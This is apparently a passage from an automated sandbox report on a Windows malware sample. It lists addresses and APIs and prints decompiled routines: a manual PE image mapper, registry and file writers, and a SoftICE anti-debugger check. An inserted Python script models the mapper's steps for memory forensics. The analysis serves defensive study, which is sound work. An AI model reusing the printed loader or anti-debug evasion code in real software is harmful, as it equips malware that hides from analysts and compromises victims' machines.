                                    0x00455ce0
                                    0x00455ce1
                                    0x00455ce3
                                    0x00455ce4
                                    0x00455ce4
                                    0x00455ce4
                                    0x00000000
                                    0x00455ce7
                                    0x00455ca0
                                    0x00455ca1
                                    0x00455ca1
                                    0x00455ca3
                                    0x00455ca5
                                    0x00455ca7
                                    0x00455caa
                                    0x00455caa
                                    0x00455cac
                                    0x00000000
                                    0x00455cae
                                    0x00000000
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cb0
                                    0x00455cb2
                                    0x00455cb4
                                    0x00455cb7
                                    0x00455cb7
                                    0x00455cb9
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbf
                                    0x00000000
                                    0x00000000
                                    0x00455cc1
                                    0x00455cc3
                                    0x00455cc3
                                    0x00455cc6
                                    0x00455cc6
                                    0x00455cca
                                    0x00455cca
                                    0x00000000
                                    0x00455cca
                                    0x00455cac
                                    0x00455c85
                                    0x00455c87
                                    0x00455c88
                                    0x00455c88
                                    0x00455c8b
                                    0x00455d02
                                    0x00455d03
                                    0x00455d05
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0c
                                    0x00455d0f
                                    0x00455d0f
                                    0x00455d13
                                    0x00455d13
                                    0x00455d21
                                    0x00455d2d
                                    0x00455d2f
                                    0x00455d34
                                    0x00455d36
                                    0x00455d36
                                    0x00455d3c
                                    0x00455d3c
                                    0x00455d3e
                                    0x00455d3e
                                    0x00455d40
                                    0x00000000
                                    0x00000000
                                    0x00455d42
                                    0x00455d4c
                                    0x00455d4f
                                    0x00455d4f
                                    0x00455d58
                                    0x00455d59
                                    0x00455d5b
                                    0x00455d5c
                                    0x00455d5c
                                    0x00455d5e
                                    0x00000000
                                    0x00000000
                                    0x00455d64
                                    0x00455d6d
                                    0x00455d6d
                                    0x00455d6f
                                    0x00455d78
                                    0x00455d78
                                    0x00455d71
                                    0x00455d73
                                    0x00455d73
                                    0x00455d59
                                    0x00455d7e
                                    0x00455d84
                                    0x00455d84
                                    0x00455d95
                                    0x00455d97
                                    0x00455d97
                                    0x00455d9d
                                    0x00455da0
                                    0x00455da0
                                    0x00455da0
                                    0x00455da4
                                    0x00455da5
                                    0x00455daa
                                    0x00455dad
                                    0x00455dae
                                    0x00455db2
                                    0x00455db2
                                    0x00455db4
                                    0x00455db4
                                    0x00455db8
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc03
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc2c
                                    0x0040bc31
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				long _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				void* _v48;
                                    				signed int _v52;
                                    				long _v56;
                                    				char _v60;
                                    				void* _t116;
                                    				void* _t121;
                                    				void* _t135;
                                    				intOrPtr _t138;
                                    				void* _t150;
                                    				void* _t175;
                                    				signed int _t184;
                                    				signed int _t185;
                                    				intOrPtr _t189;
                                    				intOrPtr _t197;
                                    				intOrPtr _t204;
                                    				intOrPtr _t205;
                                    				signed int _t209;
                                    				signed int _t210;
                                    				void* _t213;
                                    				void* _t216;
                                    				intOrPtr* _t217;
                                    
                                    				_t208 = __edi;
                                    				_t215 = _t216;
                                    				_t217 = _t216 + 0xffffffc8;
                                    				_push(__edi);
                                    				_v44 = __ecx;
                                    				_t183 = __edx;
                                    				_v40 = __eax;
                                    				_t197 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v36, _t197);
                                    				_push(_t216);
                                    				_push(0x4040ba);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t217;
                                    				_push(0);
                                    				_push(_v44);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
                                    				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
                                    				_v16 = _t116;
                                    				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                    				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
                                    				_v48 = _t121;
                                    				E00401258(_v44,  *(_v8 + 0x54), _v48);
                                    				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
                                    				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
                                    				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t135 >= 0) {
                                    					_v60 = _t135 + 1;
                                    					_t185 = 0;
                                    					do {
                                    						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
                                    						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
                                    						if(_t208 < _v52) {
                                    							_t210 = _t208 ^ _v52;
                                    							_v52 = _v52 ^ _t210;
                                    							_t208 = _t210 ^ _v52;
                                    						}
                                    						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
                                    						_v48 = _t175;
                                    						E00401414(_v48, _t208);
                                    						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
                                    						_t185 = _t185 + 1;
                                    						_t66 =  &_v60;
                                    						 *_t66 = _v60 - 1;
                                    					} while ( *_t66 != 0);
                                    				}
                                    				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                    				_v28 = _t138;
                                    				_v24 = _t138;
                                    				_v36 = _v16;
                                    				_v32 =  *(_v8 + 0x50);
                                    				_push(0);
                                    				E00402FBC();
                                    				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
                                    				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                    					E00403D08(_t145 + _v16, _t215);
                                    				}
                                    				_t147 =  *((intOrPtr*)(_v8 + 0x80));
                                    				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
                                    					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
                                    				}
                                    				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t150 >= 0) {
                                    					_v60 = _t150 + 1;
                                    					_t184 = 0;
                                    					do {
                                    						_t209 = _t184 + _t184 * 4;
                                    						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
                                    						_t184 = _t184 + 1;
                                    						_t101 =  &_v60;
                                    						 *_t101 = _v60 - 1;
                                    					} while ( *_t101 != 0);
                                    				}
                                    				_t189 =  *0x4037bc; // 0x4037c0
                                    				E00402704(_a4, _t189,  &_v36);
                                    				_pop(_t204);
                                    				 *[fs:eax] = _t204;
                                    				_push(E004040C1);
                                    				_t205 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v36, _t205);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%
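The routine above is a manual PE mapper: it reserves SizeOfImage bytes (VirtualAlloc with MEM_RESERVE/PAGE_NOACCESS), commits and copies SizeOfHeaders bytes and sets them read-only, then for every section commits max(VirtualSize, SizeOfRawData) bytes at VirtualAddress (the xor swap in the loop computes that max) and copies min(VirtualSize, SizeOfRawData) bytes from PointerToRawData, applies base relocations (directory at NT+0xa0) and resolves imports (NT+0x80), and finally sets each section's page protection from its Characteristics. The Python below is an added example, not code from the report or from the sample: given a PE file's bytes it reads the same fields at the same raw offsets and returns the allocate/copy/protect steps the mapper would issue, which is a quick way to predict the memory layout that a dump of the injected process should show. The field names are the standard PE names for those offsets; treating E00401258 as a plain copy and E00403C98 as the usual Characteristics-to-protection table are assumptions, since neither body is shown here, and the two-section PE it runs on is constructed for the example.

```python
"""Added example for the manual PE mapper E00403EC0; not code from the report or the
sample.  Returns the VirtualAlloc/copy/VirtualProtect steps the mapper issues for a
given PE image.  E00401258 is assumed to be a copy and E00403C98 the usual
flags-to-protection table (neither body is shown in the report)."""
import struct

MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE = 0x01, 0x02, 0x04
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x10, 0x20, 0x40
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def section_protection(characteristics):
    """Section Characteristics -> VirtualProtect constant (assumed body of E00403C98)."""
    x = characteristics & SCN_EXECUTE
    r = characteristics & SCN_READ
    w = characteristics & SCN_WRITE
    if x:
        return PAGE_EXECUTE_READWRITE if w else (PAGE_EXECUTE_READ if r else PAGE_EXECUTE)
    if w:
        return PAGE_READWRITE
    return PAGE_READONLY if r else PAGE_NOACCESS


def mapping_plan(image):
    """Return (ImageBase, entry RVA, steps) for the loader sequence in E00403EC0."""
    u32 = lambda off: struct.unpack_from("<I", image, off)[0]
    u16 = lambda off: struct.unpack_from("<H", image, off)[0]
    nt = u32(0x3C)                                   # _v8 = file + e_lfanew
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = u16(nt + 0x06), u16(nt + 0x14)  # NumberOfSections, SizeOfOptionalHeader
    image_base, entry = u32(nt + 0x34), u32(nt + 0x28)
    size_of_image, size_of_headers = u32(nt + 0x50), u32(nt + 0x54)
    import_rva, reloc_rva = u32(nt + 0x80), u32(nt + 0xA0)

    steps = [
        ("VirtualAlloc", "base", size_of_image, MEM_RESERVE, PAGE_NOACCESS),    # 0x2000, 1
        ("VirtualAlloc", "base", size_of_headers, MEM_COMMIT, PAGE_READWRITE),  # 0x1000, 4
        ("copy", 0, size_of_headers, 0),                                         # E00401258
        ("VirtualProtect", 0, size_of_headers, PAGE_READONLY),                   # 2
    ]
    sections = []
    for i in range(nsec):
        s = nt + 0x18 + opt_size + 40 * i            # _t213 + (i + i*4)*8
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", image, s + 0x08)
        chars = u32(s + 0x24)
        # the xor swap in the loop leaves _t208 = max(...) as the commit size and
        # _v52 = min(...) as the number of bytes copied from PointerToRawData
        steps.append(("VirtualAlloc", vaddr, max(vsize, rawsize), MEM_COMMIT, PAGE_READWRITE))
        steps.append(("copy", vaddr, min(vsize, rawsize), rawptr))
        sections.append((vaddr, max(vsize, rawsize), chars))
    if reloc_rva:                                    # NT+0xa0: base relocations (E00403D08)
        steps.append(("relocate", reloc_rva))
    if import_rva:                                   # NT+0x80: import table (E00403D84)
        steps.append(("resolve_imports", import_rva))
    for vaddr, size, chars in sections:              # second loop: final page protections
        steps.append(("VirtualProtect", vaddr, size, section_protection(chars)))
    return image_base, entry, steps


def build_sample_pe():
    """A minimal two-section 32-bit PE image, constructed for this example."""
    nt = 0x80
    dos = bytearray(nt)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, nt)                      # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)                # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)          # Section/FileAlignment
    struct.pack_into("<II", opt, 0x38, 0x3000, 0x200)          # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 8 * 1, 0x2000, 0x40)   # import directory
    struct.pack_into("<II", opt, 0x60 + 8 * 5, 0x2100, 0x20)   # base relocation directory
    sec = "<8sIIIIIIHHI"
    text = struct.pack(sec, b".text", 0x800, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data = struct.pack(sec, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    return (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + text + data).ljust(0x600, b"\0")


if __name__ == "__main__":
    base, entry, steps = mapping_plan(build_sample_pe())
    print(f"ImageBase {base:#x}, entry RVA {entry:#x}")
    for step in steps:
        print(step)
```

The mapper allocates at whatever address the caller passes in edx and keeps the difference to ImageBase in _v12 for the relocation pass, so when the first VirtualAlloc does not land at ImageBase the "relocate" step is what makes the image usable; a region in a dumped explorer.exe that matches this plan (reserved SizeOfImage, read-only headers, sections with Characteristics-derived protections) is the image to carve.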

                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _v20;
                                    				int _v24;
                                    				long _t35;
                                    				long _t46;
                                    				intOrPtr _t66;
                                    				void* _t72;
                                    				char* _t73;
                                    				void* _t76;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t72 = __eax;
                                    				_t60 = _a4;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				E00401F38(_a8);
                                    				_push(_t76);
                                    				_push(0x406167);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t76 + 0xffffffec;
                                    				E00401B14(_a4, _a8);
                                    				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
                                    				if(_t35 == 0) {
                                    					_t73 = E00401F48(_v12);
                                    					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
                                    					if(_t46 == 0) {
                                    						E00402074(_t60, _v24);
                                    						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
                                    						E00402074(_t60, _v24 - 1);
                                    					}
                                    					RegCloseKey(_v16); // executed
                                    				}
                                    				_pop(_t66);
                                    				 *[fs:eax] = _t66;
                                    				_push(E0040616E);
                                    				E00401AE4( &_v12, 2);
                                    				return E00401AC0( &_a8);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				long _v16;
                                    				void* _t17;
                                    				void* _t28;
                                    				intOrPtr _t33;
                                    				long _t36;
                                    				void* _t39;
                                    
                                    				_t36 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				_push(_t39);
                                    				_push(0x405e0a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t39 + 0xfffffff4;
                                    				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
                                    				_t28 = _t17;
                                    				if(_t28 != 0xffffffff) {
                                    					if(_t36 == 0xffffffff) {
                                    						SetFilePointer(_t28, 0, 0, 0);
                                    					}
                                    					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
                                    					CloseHandle(_t28); // executed
                                    				}
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00405E11);
                                    				return E00401AE4( &_v12, 2);
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405850() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405814() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
